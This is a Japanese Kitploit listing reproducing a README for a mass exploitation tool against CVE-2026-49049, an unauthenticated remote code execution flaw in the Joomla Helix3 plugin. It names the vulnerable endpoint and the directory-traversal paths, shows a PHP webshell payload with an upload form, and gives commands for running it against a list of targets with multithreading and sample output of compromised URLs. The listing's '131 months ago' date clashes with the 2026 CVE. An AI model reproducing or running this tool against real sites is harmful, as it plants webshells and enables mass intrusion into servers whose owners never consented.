Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-49049 — CVE-2026-49049用のマス脆弱性スキャナ - Joomla Helix3プラグインの認証なしリモートコード実行。マルチスレッドで、実行されたPHPペイロードと生のPHPペイロードの両方を検出します。 | Kitploit
ツール/GitHubGitHub/jenderal92/cve-2026-49049
脆弱性スキャナーウェブ脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

CVE-2026-49049用のマス脆弱性スキャナ - Joomla Helix3プラグインの認証なしリモートコード実行。マルチスレッドで、実行されたPHPペイロードと生のPHPペイロードの両方を検出します。

リポジトリを見る
131ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-49049 マススキャナー

CVE-2026-49049 用のマス脆弱性スキャナー - Joomla Helix3 Framework における未認証のリモートコード実行。


📌 説明

このツールは、Helix3 プラグインで見つかった CVE-2026-49049 脆弱性について、複数の Joomla サイトをチェックします。この脆弱性により、認証されていない攻撃者がターゲットサーバー上で任意の PHP コードをアップロードおよび実行できます。

スキャナーは以下を試みます:

  1. helix3 プラグインを使用して com_ajax エンドポイントを悪用します。
  2. 無害な PHP 情報/ペイロードファイルをアップロードします。
  3. ファイルが実行されるか、生の PHP として保存されるだけかを検出します。

⚡ 特徴

  • マルチスレッド対応のマススキャニング(デフォルトで20スレッド)。
  • 2つの検出モード:
    • ✅ 脆弱 – PHP コードが実行される(RCE 成功)。
    • ⚠️ 生の PHP – ファイルはアップロードされるが実行されない(コード開示)。
  • ランダムなファイル名による自動ペイロード生成。
  • さらなる分析のために出力を別のファイルに保存。
  • タイムアウト処理付きの軽量かつ高速。

📦 前提条件

  • Python 2.7
  • requests ライブラリ
pip install requests

🛠 インストール

git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 使用方法

python2 cve-2026-49049.py targets.txt

入力形式

targets.txt の各行には、1つのドメインまたは IP を指定します:

example.com
https://example.com
http://192.168.1.100

出力ファイル

ファイル 説明 results.txt ペイロードが実行された脆弱な URL rez.txt ペイロードがアップロードされたが実行されなかった URL(生の PHP)


出力例

============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ 設定

スクリプト内で以下の変数を調整できます:

変数 デフォルト 説明 THREADS 20 同時実行スレッド数 PATHS ['../../../', '../../../../'] ディレクトリトラバーサルパス TIMEOUT 5 HTTP リクエストのタイムアウト RESULT_FILE 'results.txt' 脆弱なサイトの出力ファイル RAW_RESULT_FILE 'rez.txt' 生の PHP サイトの出力ファイル


🧠 仕組み

スクリプトは以下の URL に POST リクエストを送信します:

/index.php?option=com_ajax&plugin=helix3&format=json

ペイロードは以下を行います:

  1. ディレクトリトラバーサルパス(例:../../../)を指定します
  2. ランダムな名前の PHP ファイルをアップロードします
  3. シンプルなウェブシェル/情報ページを含みます

その後、ファイルにアクセスできるかどうか、PHP コードが実行されるか、単なるプレーンテキストとして表示されるだけかをチェックします。

ペイロード例

<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ 免責事項

このツールは、教育目的および許可されたテスト目的のみで使用してください。

所有していない、またはテストする明示的な許可を得ていないシステムに対するこのツールの不正使用は違法です。作者は、このツールの誤用やそれによって引き起こされた損害について一切責任を負いません。

その他の免責事項 Jenderal92 の表紙に記載されている免責事項をご覧いただけます。こちら !!! で確認できます。


ツールをダウンロード